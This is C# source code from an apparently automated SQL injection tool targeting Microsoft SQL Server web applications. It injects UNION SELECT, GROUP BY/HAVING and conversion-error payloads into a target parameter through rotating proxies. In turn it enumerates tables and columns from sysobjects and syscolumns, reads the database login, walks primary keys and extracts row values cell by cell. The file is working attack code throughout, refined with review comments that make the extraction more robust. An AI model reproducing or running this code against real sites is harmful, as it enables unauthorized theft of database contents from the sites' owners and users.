/// <summary>
/// First-pass type discovery for the columns enumerated into _QueryStructure.
/// For each field the vector "UNION SELECT SUM(&lt;column&gt;) FROM &lt;table&gt;--" is
/// injected; the server-side error that SUM() raises on a non-numeric column is handed to
/// ParsePage.ParseUnionSumError, and the resulting SqlDbType is written back into
/// _QueryStructure at the same index.
/// Expects EnumerateAttackVector to have populated _QueryStructure beforehand.
/// </summary>
private void TypeCastAttackVector()
{
    int fieldCount = _QueryStructure.Count;
    for (int index = 0; index < fieldCount; index++)
    {
        UserStatus(String.Format("Counter is at {0} of {1}", index, fieldCount));

        GlobalDS.Field field = (GlobalDS.Field)_QueryStructure[index];

        // Trailing "--" comments out whatever the application appends after the injection point.
        string vector = _VectorBuffer
            + " UNION SELECT SUM(" + field.FullName
            + ") FROM " + field.TableName
            + "--";
        _AttackParams[_VectorName] = vector;
        UserStatus(String.Format("hmm: {0}", vector));

        string page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

        field.DataType = ParsePage.ParseUnionSumError(page, _Plugin);
        UserStatus(String.Format("Resulting Data: {0} - {1}", field.FullName, field.DataType));

        // Written back by index so the new DataType is stored even if Field is a value type.
        _QueryStructure[index] = field;
    }
    UserStatus("Finished Typecasting..");
}
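/// <summary>
/// Reads the definition of the next column after <paramref name="FieldID"/> in the table
/// identified by <paramref name="TableID"/>: name and xtype from syscolumns, then the
/// sysconstraints status bits to decide whether the column is a primary key.
/// </summary>
/// <param name="TableID">sysobjects.id of the table being enumerated.</param>
/// <param name="FieldID">colid of the previously fetched column; the syscolumns query asks for colid &gt; FieldID.</param>
/// <returns>
/// The column, or a Field with an empty FieldName when the response carried no parsable
/// "name:xtype" pair (the original threw IndexOutOfRange/FormatException in that case).
/// </returns>
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
    GlobalDS.Field retVal = new GlobalDS.Field();

    // name + ':' + xtype; char(58) is ':' so the payload needs no quote characters.
    string columnWhere = "id=" + TableID + " and colid > " + FieldID;
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", columnWhere);
    string resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string pulledData = ParsePage.ParseUnionSelectForNvarchar(resultPage, _Plugin);

    string[] values = (pulledData ?? string.Empty).Split(':');
    long xtype;
    if (values.Length < 2 || !long.TryParse(values[1].Trim(), out xtype))
    {
        // No ':' separator (blocked request, end of columns) or a non-numeric xtype:
        // leave FieldName empty so the caller can treat it as "no more columns".
        return retVal;
    }
    retVal.FieldName = values[0];
    retVal.DataType = GetSqlDataType(xtype);

    // NOTE(review): this looks up colid = FieldID, i.e. the column *before* the one just
    // returned (colid > FieldID). Confirm the caller passes the id it expects here.
    // NOTE(review): sysconstraints.status encodes the constraint kind in its low bits
    // (1 = PRIMARY KEY per the SQL Server docs); `& 1` also matches other odd values — confirm.
    string constraintWhere = "id=" + TableID + " and colid=" + FieldID;
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", constraintWhere);
    resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    pulledData = ParsePage.ParseUnionSelectForVarchar(resultPage, _Plugin);
    if (pulledData != null && pulledData.Length > 0)
    {
        // Drop the leading ':' marker; a non-numeric status leaves IsPrimary false.
        int status;
        if (int.TryParse(pulledData.Substring(1).Trim(), out status))
        {
            retVal.IsPrimary = ((status & 1) == 1);
        }
    }
    return(retVal);
}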
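/// <summary>
/// Fetches the first user table (sysobjects.xtype = char(85) = 'U') whose id is greater
/// than <paramref name="PreviousTableID"/>, together with its row count. Both values are
/// smuggled out through a convert(int, ...) conversion error whose message echoes the text.
/// </summary>
/// <param name="PreviousTableID">sysobjects.id of the last table retrieved (0 to start).</param>
/// <returns>
/// The table with Name, ObjectID and RecordCount set; RecordCount is -1 when the count could
/// not be read. When no "name:id" pair could be parsed, Name is left unset and RecordCount
/// is -1 (the original threw IndexOutOfRange/FormatException instead).
/// </returns>
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
    GlobalDS.Table retVal = new GlobalDS.Table();
    retVal.RecordCount = -1;

    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
    string resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string resultText = ParsePage.ParseUnionSelectForNvarchar(resultPage, _Plugin);

    string[] values = (resultText ?? string.Empty).Split(':');
    long objectId;
    if (values.Length < 2 || !long.TryParse(values[1].Trim(), out objectId))
    {
        // No parsable "name:id" (end of tables, or the request was blocked): return without a Name.
        return retVal;
    }
    retVal.Name = values[0];
    retVal.ObjectID = objectId;

    // Row count, again via a conversion error on ':' + count(*).
    // NOTE(review): the table name is interpolated unquoted; names that need [brackets] will break here.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", retVal.Name, null);
    resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    resultText = ParsePage.ParseUnionSelectForVarchar(resultPage, _Plugin);
    long recordCount;
    if (resultText != null && resultText.Length > 0 && long.TryParse(resultText.Substring(1).Trim(), out recordCount))
    {
        retVal.RecordCount = recordCount;
    }
    return(retVal);
}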
/// <summary>
/// Discovers the columns of the injected query one at a time with the GROUP BY / HAVING
/// trick: "HAVING 1=1" with an incomplete GROUP BY list makes the server name the first
/// column that is not grouped, and ParsePage.ParseGroupedHaving lifts that column out of the
/// error page. Each discovered column is added to the GROUP BY list and the request repeated
/// until the server stops naming new columns.
/// Resets and fills _QueryStructure; echoes every response page to the console.
/// </summary>
private void EnumerateAttackVector()
{
    _QueryStructure = new List <GlobalDS.Field>();
    while (true)
    {
        StringBuilder vector = new StringBuilder();
        vector.Append(_VectorBuffer);

        if (_QueryStructure.Count > 0)
        {
            // " GROUP BY a, b, c" — one leading space per name, comma-separated.
            List<string> grouped = new List<string>();
            foreach (GlobalDS.Field known in _QueryStructure)
            {
                grouped.Add(" " + known.FullName);
            }
            vector.Append(" GROUP BY");
            vector.Append(string.Join(",", grouped.ToArray()));
        }

        vector.Append(" HAVING 1=1");
        if (_Options.TerminateQuery)
        {
            vector.Append("--");
        }
        _AttackParams[_VectorName] = vector.ToString();

        string page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
        System.Console.WriteLine(page);

        GlobalDS.Field discovered = ParsePage.ParseGroupedHaving(page, _Plugin);
        if (discovered.FieldName.Length == 0)
        {
            // No further column named in the error: enumeration is complete.
            UserStatus(page);
            break;
        }
        _QueryStructure.Add(discovered);
        UserStatus(String.Format("QueryStructure Size After adding: {0}", _QueryStructure.Count));
    }
    System.Console.WriteLine("Done Enumeration, I think");
}
/// <summary>
/// Second-pass type refinement for the columns FindAllVariInts picks out of _QueryStructure.
/// For each such column a "UNION ALL SELECT ... ORDER BY 1--" vector is built in which that
/// column (and every char-like column) is fed char(0x61), text/ntext/variant columns get
/// NULL, and everything else gets 1; the response is handed to
/// ParsePage.ParseUnionSelectForIntegerRefinement and the refined SqlDbType is stored back.
/// </summary>
private void RefinedTypeCasting()
{
    List <int> integerColumns = FindAllVariInts(_QueryStructure);
    for (int refineIndex = 0; refineIndex < integerColumns.Count; refineIndex++)
    {
        UserStatus("Refining Integer #" + refineIndex);
        int targetColumn = integerColumns[refineIndex];

        StringBuilder vector = new StringBuilder();
        vector.Append(_VectorBuffer).Append(" UNION ALL SELECT ");
        for (int column = 0; column < _QueryStructure.Count; column++)
        {
            GlobalDS.Field field = (GlobalDS.Field)_QueryStructure[column];
            if (column == targetColumn)
            {
                vector.Append("char(0x61),");
                continue;
            }
            switch (field.DataType)
            {
                case System.Data.SqlDbType.VarChar:
                case System.Data.SqlDbType.Char:
                case System.Data.SqlDbType.NVarChar:
                    vector.Append("char(0x61),");
                    break;
                // text/ntext/variant cannot take a char literal in the UNION; NULL is type-compatible with anything.
                case System.Data.SqlDbType.Text:
                case System.Data.SqlDbType.NText:
                case System.Data.SqlDbType.Variant:
                    vector.Append("NULL,");
                    break;
                default:
                    UserStatus(String.Format("Refining {0}", field.DataType));
                    vector.Append("1,");
                    break;
            }
        }
        vector.Remove(vector.Length - 1, 1); // drop the trailing comma
        vector.Append(" ORDER BY 1--");
        _AttackParams[_VectorName] = vector.ToString();

        string page = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

        // Written back by index so the refined type is stored even if Field is a value type.
        GlobalDS.Field adjusted = (GlobalDS.Field)_QueryStructure[targetColumn];
        adjusted.DataType = ParsePage.ParseUnionSelectForIntegerRefinement(page, _Plugin);
        _QueryStructure[targetColumn] = adjusted;
    }
    UserStatus("Finished Refining Typecasts");
}
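/// <summary>
/// Counts the user tables (sysobjects.xtype = char(85) = 'U') in the current database by
/// injecting a SELECT of ':' + count(name) + ':' and reading the bracketed number back out
/// of the response.
/// </summary>
/// <returns>
/// The table count, or -1 when the response carried no parsable count (the same sentinel
/// RetrieveTable uses for RecordCount). The original threw ArgumentOutOfRangeException on an
/// empty response and FormatException on a non-numeric one.
/// </returns>
private long GetTableCount()
{
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");
    string resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string pulledCount = ParsePage.ParseUnionSelectForVarchar(resultPage, _Plugin);

    // A blocked or unparsed response yields an empty/short string; Substring(1, Length - 2) would throw.
    if (pulledCount == null || pulledCount.Length < 2)
    {
        return -1;
    }

    // Strip the two ':' markers that bracket the number.
    pulledCount = pulledCount.Substring(1, pulledCount.Length - 2).Trim();

    long count;
    if (!long.TryParse(pulledCount, out count))
    {
        return -1;
    }
    return(count);
}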
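/// <summary>
/// Pull the username the database is running as.
/// SYSTEM_USER is wrapped in '(' / ')' (char(40) / char(41)) so the parser can locate it in
/// the page without the payload containing quote characters.
/// </summary>
/// <returns>The database username, or an empty string when nothing could be parsed from the
/// response (the original threw ArgumentOutOfRangeException in that case).</returns>
public string GetDatabaseUsername()
{
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);
    string resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string username = ParsePage.ParseUnionSelectForNvarchar(resultPage, _Plugin);

    // Need at least the two bracket characters before stripping them.
    if (username == null || username.Length < 2)
    {
        return string.Empty;
    }
    return(username.Substring(1, username.Length - 2)); // remove brackets
}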
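/// <summary>
/// Fetches the smallest primary-key value of <paramref name="TableName"/> greater than the
/// one in <paramref name="CurrentPrimaryKey"/> (or the overall minimum when the current key
/// is for a different column), via min(KeyName) bracketed by ':' markers.
/// For character keys the value is re-encoded as "char(n) + char(m) + ..." so it can be
/// placed in the next WHERE clause without quote characters; numeric keys are used as-is.
/// </summary>
/// <param name="TableName">Table to walk.</param>
/// <param name="KeyName">Primary-key column name.</param>
/// <param name="CurrentPrimaryKey">Key returned by the previous call; its Value becomes the lower bound when Name matches.</param>
/// <param name="PrimaryKeyType">SqlDbType of the key column; decides the encoding of Value.</param>
/// <returns>
/// A PrimaryKey whose Value is the encoded form for the next query and OutputValue the raw
/// text read from the page. When the response holds no parsable value, both are empty
/// strings (the original threw ArgumentOutOfRangeException from Substring).
/// </returns>
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
    StringBuilder whereClause = new StringBuilder();
    if (CurrentPrimaryKey.Name == KeyName)
    {
        whereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
    }
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, whereClause.ToString());
    string resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string resultText = ParsePage.ParseUnionSelectForVarchar(resultPage, _Plugin);

    GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
    retVal.Name = KeyName;

    // Nothing parsed (end of table, or the request was blocked): hand back an empty key.
    if (resultText == null || resultText.Length < 2)
    {
        retVal.Value = "";
        retVal.OutputValue = "";
        return(retVal);
    }
    resultText = resultText.Substring(1, resultText.Length - 2); // strip the ':' markers

    string workingText;
    switch (PrimaryKeyType)
    {
        case SqlDbType.VarChar:
        case SqlDbType.Char:
        case SqlDbType.NChar:
        case SqlDbType.NText:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
            StringBuilder elementBuilder = new StringBuilder();
            foreach (char c in resultText)
            {
                // (int)c is the character's code unit. The original used Char.GetNumericValue,
                // which returns the digit value of '0'..'9' and -1 for every other character,
                // so any non-digit key produced "char(-1)" and the next query matched nothing.
                // NOTE(review): T-SQL char() only covers 0..255; code units above that would
                // need nchar() — confirm whether such keys occur.
                elementBuilder.Append("char(").Append((int)c).Append(") + ");
            }
            if (elementBuilder.Length >= 2)
            {
                elementBuilder.Remove(elementBuilder.Length - 2, 2); // remove trailing '+ '
            }
            workingText = elementBuilder.ToString();
            break;
        default:
            workingText = resultText.Trim();
            break;
    }

    retVal.Value = workingText;
    retVal.OutputValue = resultText;
    return(retVal);
}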
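// }}}
// {{{ GetFieldData
/// <summary>
/// Reads one cell of <paramref name="TableName"/>: the value of <paramref name="Column"/> in
/// the row whose primary key equals <paramref name="pk"/>. The value is selected as
/// ':' + convert(nvarchar, column) + ':' so the parser can find it in the page; when the
/// requested column is the primary key itself, the key's value is returned without a request.
/// </summary>
/// <param name="TableName">Table to read from.</param>
/// <param name="Column">Column to read; its DataType selects the conversion.</param>
/// <param name="pk">Primary key of the target row; pk.Value must already be in a form usable in a WHERE clause.</param>
/// <returns>
/// A DictionaryEntry keyed by the column name. Value is the cell text, or an empty string
/// when the column type is unsupported (image/binary/varbinary and anything not listed) or
/// the response held no parsable value. The original injected an empty SELECT clause for
/// unsupported types and then threw ArgumentOutOfRangeException from Substring.
/// </returns>
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
    DictionaryEntry retVal = new DictionaryEntry();
    retVal.Key = Column.FieldName;
    retVal.Value = string.Empty;

    if (Column.FieldName.Equals(pk.Name))
    {
        retVal.Value = pk.Value;
        return(retVal);
    }

    switch (Column.DataType)
    {
        // All supported types go through the same nvarchar conversion.
        case SqlDbType.BigInt:
        case SqlDbType.SmallInt:
        case SqlDbType.TinyInt:
        case SqlDbType.Int:
        case SqlDbType.Decimal:
        case SqlDbType.DateTime:
        case SqlDbType.Money:
        case SqlDbType.Float:
        case SqlDbType.Real:
        case SqlDbType.SmallDateTime:
        case SqlDbType.SmallMoney:
        case SqlDbType.Timestamp:
        case SqlDbType.UniqueIdentifier:
        case SqlDbType.NChar:
        case SqlDbType.Char:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
        case SqlDbType.NText:
        case SqlDbType.VarChar:
        case SqlDbType.Bit:
            break;
        case SqlDbType.Image:
        case SqlDbType.Binary:
        case SqlDbType.VarBinary:
        default:
            // TODO: binary columns are not supported; return an empty value rather than
            // sending a malformed vector with no SELECT clause.
            return(retVal);
    }

    string selectClause = "char(58) + convert(nvarchar, " + Column.FieldName + ") + char(58)";
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(selectClause, TableName, pk.Name + " = " + pk.Value);
    string resultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string resultText = ParsePage.ParseUnionSelectForNvarchar(resultPage, _Plugin);

    // Need both ':' markers before stripping them; otherwise leave Value empty.
    if (resultText == null || resultText.Length < 2)
    {
        return(retVal);
    }
    retVal.Value = resultText.Substring(1, resultText.Length - 2);
    return(retVal);
}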